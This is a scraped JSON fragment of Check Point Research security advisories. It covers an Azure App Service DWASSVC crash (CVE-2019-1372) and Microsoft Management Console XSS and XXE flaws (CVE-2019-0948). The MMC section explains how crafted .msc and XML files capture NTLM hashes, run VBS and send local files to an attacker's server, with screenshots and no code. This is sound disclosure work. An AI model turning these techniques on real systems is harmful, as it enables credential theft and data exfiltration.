\n

We created a C# Azure function which loads a native DLL and calls the load function.

\n

\n

The load function brute forces the handles until it finds an open one whose name starts with “iisipm”. Then it constructs the malicious message and sends it immediately. As a result, DWASSVC crashes.

\n

Although we only demonstrated a crash, this vulnerability could be exploited to a privilege escalation.

\n

Impact

\n

Microsoft has various App Service plans:

\n\n

For more information, see: https://docs.microsoft.com/en-us/azure/app-service/overview-hosting-plans

\n

 

\n

Exploiting this vulnerability in all of the plans could allow us to compromise Microsoft’s App Service infrastructure. However, exploiting it specifically on a Free/Shared plan could also allow us to compromise other tenant apps, data, and accounts! Thus breaking the security model of App Service.

\n

Conclusion

\n

The cloud is not a magical place. Although it is considered safe, it is ultimately an infrastructure that consists of code that can have vulnerabilities – just as we demonstrated in this article.

\n

This vulnerability was disclosed and fixed by Microsoft and assigned as CVE-2019-1372.
\nMicrosoft acknowledged that this vulnerability worked on Azure Cloud and Azure Stack

\n","status":"PUBLISHED","fileName":"//research.checkpoint.com/wp-content/uploads/2020/01/CheckPointResearchAzureStack_blog_header-FINAL-1-300x170.jpg","link":"https://research.checkpoint.com/2020/remote-cloud-execution-critical-vulnerabilities-in-azure-cloud-infrastructure-part-ii/","tags":[],"score":0.609135627746582,"topStoryDate":null},{"id":"RS-21635","type":"Research_Publications","name":"Microsoft Management Console (MMC) Vulnerabilities","author":null,"date":1560310628000,"description":"Research by: Eran Vaknin and Alon Boxiner   The goal of Microsoft Management Console (MMC) is to provide a programming platform for creating and hosting applications that manage Microsoft Windows-based environment, and to provide a simple, consistent and integrated management user interface and administration model. Recently, Check Point Research discovered several vulnerabilities in the console… Click to Read More","content":"

Research by: Eran Vaknin and Alon Boxiner

\n

 

\n

The goal of Microsoft Management Console (MMC) is to provide a programming platform for creating and hosting applications that manage Microsoft Windows-based environment, and to provide a simple, consistent and integrated management user interface and administration model.

\n

Recently, Check Point Research discovered several vulnerabilities in the console that would allow an attacker to deliver a malicious payload.

\n

Microsoft has granted CVE-2019-0948 to this vulnerability and patched it in their June 11th Patch Tuesday release.

\n

 

\n

Vulnerability Description:

\n

1) Multiple XSS vulnerabilities due to misconfigured WebView.

\n

MMC has an integrated Snap-In component which in turn contains several mechanisms such as ActiveX Control, Link to Web Address, etc.

\n
    \n
  1. As an attacker chooses the Link to Web Address snap-in, he can insert a url to his server which contains an html page with a malicious payload.
    \nAs the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed.
    \nWe have successfully managed to insert malicious URL link that contains malicious payloads such as redirection to SMB server that will capture the user NTLM hash.
    \nMoreover, it is also possible to execute VBS script on the victims’ host via the mentioned web-view.
  2. \n
  3. An attacker chooses the ActiveX Control snap-in (all ActiveX controls are vulnerable) and saves it to file (.msc file). In the .msc file, under the StringsTables section, the attacker changes the third string value to malicious url under his control, containing an html page with a malicious payload. As mentions in sections a (above) – we have successfully managed to insert malicious URL link that contains malicious payloads such as redirection to SMB server that will capture the user NTLM hash.
    \nMoreover, it is also possible to execute VBS script on the victims’ host via the mentioned web-view.
    \nAs the victim opens the malicious .msc file, a web-view is opened (within the MMC window) and the malicious payload is executed.
  4. \n
\n

2) XXE Vulnerability due to misconfigured XML parser.

\n

A victim opens the MMC and chooses the event viewer snap-in and clicks on Action and then on Import Custom View. As soon as a malicious XML file is chosen (containing an XXE payload) any file from the victims host is sent to the attacker.
\nThis is possible due to a misconfigured XML parser defined within the MMC custom view functionality.

\n

 

\n

Proof of Concept

\n

1) Link to Web Address snap-in Cross-Site Scripting (XSS):

\n

The attacker adds a new snap-in:

\n

\"\"

\n

 

\n

The victim chooses a Link to Web Address snap in:

\n

\"\"

\n

 

\n

The attacker then types the path to his server containing the malicious payload:

\n

\"\"

\n

 

\n

The attacker saves the .msc file and sends it to the victim:

\n

\"\"

\n

 

\n

The malicious .msc file contains the path to the attacker’s server:

\n

\"\"

\n

 

\n

As the victim opens the malicious .msc file VBS code is executed:

\n

\"\"

\n

 

\n

2) ActiveX Control snap-ins: (Adobe Acrobat DC Browser example):
\n

\nThe attacker adds a new snap-in:\"\"

\n


\n
The attacker chooses an ActiveX Control snap-in:

\n

\"\"

\n

 

\n

The ActiveX Control mechanism is then chosen (Adobe Acrobat DC Browser as an example):

\n

\"\"

\n

 

\n

The attacker saves the .msc file and sends it to the victim:

\n

\"\"

\n

 

\n

The malicious .msc file containing the path to the attacker’s server:

\n

\"\"

\n

 

\n

As the victim opens the malicious .msc file VBS code is executed:

\n

\"\"

\n

 

\n

3) XXE Vulnerability Due to Misconfigured XML Parser:

\n

Add a snap-in:\"\"

\n

 

\n

The attacker chooses the event viewer snap-in:

\n

\"\"

\n

 

\n

The victim selects ‘Action’ and then clicks on the ‘Import Custom View’ option:

\n

\"\"

\n

 

\n

The victim selects the malicious XML sent by the attacker

\n

\"\"

\n

 

\n

The malicious XML containing the XXE payload will read the c:\\windows\\win.ini file content and send it to the remote server via HTTP/GET request:

\n

\"\"

\n

 

\n

 

\n

Which in turn will call to xml.dtd:

\n

\"\"

\n

 

\n

The desired file content is sent from the client console application to a remote server:

\n

\"\"

\n\n","status":"PUBLISHED","fileName":null,"link":"https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/","tags":[],"score":0.559019148349762,"topStoryDate":null}],"mapData":null,"topMalwareFamilies":null};